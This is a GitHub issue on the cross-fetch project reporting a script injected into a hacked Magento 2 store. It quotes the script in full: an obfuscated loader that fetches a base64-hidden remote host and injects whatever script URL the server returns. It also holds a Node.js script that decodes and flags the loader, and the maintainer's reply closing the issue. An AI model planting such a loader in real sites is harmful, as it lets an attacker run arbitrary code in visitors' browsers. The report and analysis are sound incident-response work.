lquixada / cross-fetch

Universal WHATWG Fetch API for Node, Browsers and React Native.
MIT License

Magento 2 hacked and added this script which reaches this repo #159

Closed vy-shmal closed 1 year ago

vy-shmal commented 1 year ago

We have a Magento 2 store to whose header a hacker somehow added this script.

<script>fetch(atob('aHR0cHM6Ly9vc29idGVjaC55YWNodHM'),{method: 'POST'}).then(r=> r.blob()).then(d=> d.text().then(b=>{const s=document.createElement('script'); s.src=atob(b); s.async=true; document.head.appendChild(s);}));</script>

aHR0cHM6Ly9vc29idGVjaC55YWNodHM = https://osobtech.yachts

The POST request returns

Ly91bnBrZy5jb20vY3Jvc3MtZmV0Y2hAMy4xLjUvZGlzdC9jcm9zcy1mZXRjaC5qcw = //unpkg.com/cross-fetch@3.1.5/dist/cross-fetch.js

When I decoded it, it pointed me to the cross-fetch repo.

I added it here so you would be aware of the issue.
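The snippet above is a two-stage loader: the first stage POSTs to a base64-hidden origin, and whatever base64 the server answers with becomes the `src` of a dynamically injected `<script>`. Nothing in the snippet pins that second stage (no integrity hash, no allow-list), so the server can hand back a different script on any request, and the benign unpkg copy of cross-fetch seen at report time only describes what it returned to that one client. The following Node.js script is an added example, not code from the issue or from the cross-fetch project: it pulls the `atob()` literals out of the injected snippet, decodes them the way the browser would, resolves the protocol-relative second-stage path against an assumed page origin (`https://shop.example`, a placeholder), and lists the loader characteristics a reviewer would look for. The snippet and the POST response body are copied from the report above as constructed test input.

```javascript
// Added example, not part of the issue thread or the cross-fetch project.
// Decodes the staged loader from the report and reports what it would run.
// Assumed: page origin https://shop.example (placeholder for the hacked store).

// The injected <script>, copied from the issue (constructed test input).
const INJECTED_SNIPPET =
  "<script>fetch(atob('aHR0cHM6Ly9vc29idGVjaC55YWNodHM'),{method: 'POST'})" +
  ".then(r=> r.blob()).then(d=> d.text().then(b=>{const s=document.createElement('script'); " +
  "s.src=atob(b); s.async=true; document.head.appendChild(s);}));</script>";

// Body the POST returned when the reporter fetched it (copied from the issue).
const STAGE2_BODY = 'Ly91bnBrZy5jb20vY3Jvc3MtZmV0Y2hAMy4xLjUvZGlzdC9jcm9zcy1mZXRjaC5qcw';

// Browser atob() accepts base64 without trailing '=' padding; Node's Buffer
// does too, so the decode here matches what the victim's browser computes.
function decodeB64(s) {
  return Buffer.from(s.trim(), 'base64').toString('utf8');
}

// Collect every quoted literal passed to atob(...) in the snippet.
// atob(b), where the argument is a variable, is deliberately not matched:
// its value only exists at runtime, as the server's response.
function extractAtobLiterals(snippet) {
  const re = /atob\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(snippet)) !== null) out.push(m[2]);
  return out;
}

// Resolve the decoded stage-2 value the way assigning it to s.src would:
// a protocol-relative path ("//host/...") inherits the page's scheme.
function resolveStageUrl(decoded, pageOrigin) {
  return new URL(decoded, pageOrigin).href;
}

// Decode both stages and flag the loader traits worth noting in a report.
function analyzeLoader(snippet, stage2Body, pageOrigin) {
  const literals = extractAtobLiterals(snippet);
  const c2 = literals.length ? decodeB64(literals[0]) : null;
  const stage2 = resolveStageUrl(decodeB64(stage2Body), pageOrigin);
  const page = new URL(pageOrigin).origin;

  const indicators = [];
  if (/fetch\(\s*atob\(/.test(snippet)) indicators.push('fetch-to-base64-hidden-url');
  if (/method:\s*['"]POST['"]/.test(snippet)) indicators.push('post-beacon');
  if (/s\.src\s*=\s*atob\(/.test(snippet)) indicators.push('script-src-from-response');
  if (/document\.head\.appendChild/.test(snippet)) indicators.push('dynamic-script-injection');
  if (c2 && new URL(c2).origin !== page) indicators.push('cross-origin-c2');
  if (new URL(stage2).origin !== page) indicators.push('cross-origin-stage2');

  return { c2, stage2, indicators };
}

// Stand-alone run against the snippet from the issue.
console.log(JSON.stringify(
  analyzeLoader(INJECTED_SNIPPET, STAGE2_BODY, 'https://shop.example'), null, 2));
```

Running it prints `https://osobtech.yachts` as the first-stage origin and `https://unpkg.com/cross-fetch@3.1.5/dist/cross-fetch.js` as the second stage, with all six indicators set. When triaging a find like this, capture the POST response several times from different client addresses and user agents, since the decoded URL in the response is entirely under the remote server's control, and treat the injection point in the Magento header as the actual compromise to investigate, independent of what the second stage currently resolves to.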

lquixada commented 1 year ago

@vy-shmal Thanks for reporting. The script doesn't seem to be a security risk. Will close for now.